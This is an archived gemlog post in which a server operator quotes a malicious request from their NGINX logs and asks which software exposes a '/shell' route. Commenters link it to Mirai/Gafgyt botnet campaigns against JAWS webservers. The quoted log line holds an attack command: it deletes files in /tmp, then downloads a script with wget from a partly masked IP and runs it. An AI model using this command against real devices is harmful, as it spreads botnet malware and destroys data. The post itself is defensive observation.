💾 Archived View for gemini.panda-roux.dev › log › entry › 52 captured on 2022-04-29 at 12:21:59. Gemini links have been rewritten to link to archived content

View Raw

More Information

⬅️ Previous capture (2022-04-28)

➡️ Next capture (2023-01-29)

-=-=-=-=-=-=-

Question about malicious web requests

Posted on Friday April 8, 2022

Just a little while ago I happened to be glancing at this server's NGINX logs and noticed some obviously malicious requests resulting in 404s. Here is one of them.

[08/Apr/2022:16:42:47 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.XX.159/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"

I'm obscuring the IP address where the malicious script is hosted at just in case someone's browser wants to treat it as a hyperlink.

Based on this URL, I assume there must be some server software with a "/shell" route that will just run whatever script is in the query parameters. That's what the client who made this request thinks, anyway.

Does anyone know what ass-brained server might be doing something like that? That's such a hilariously bad idea.

- panda-roux -

next: "New gemlog URL format (and how it works)"

prev: "Update"

index

home

Leave a comment

[2022-04-08 23:06:31] Lex (a8691):

looks like webserver is called JAWS. Found your URL mentioned here: https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

[2022-04-08 23:38:47] panda-roux (ba929):

Thanks for finding that Lex. Pretty amazing just how bad this is. https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/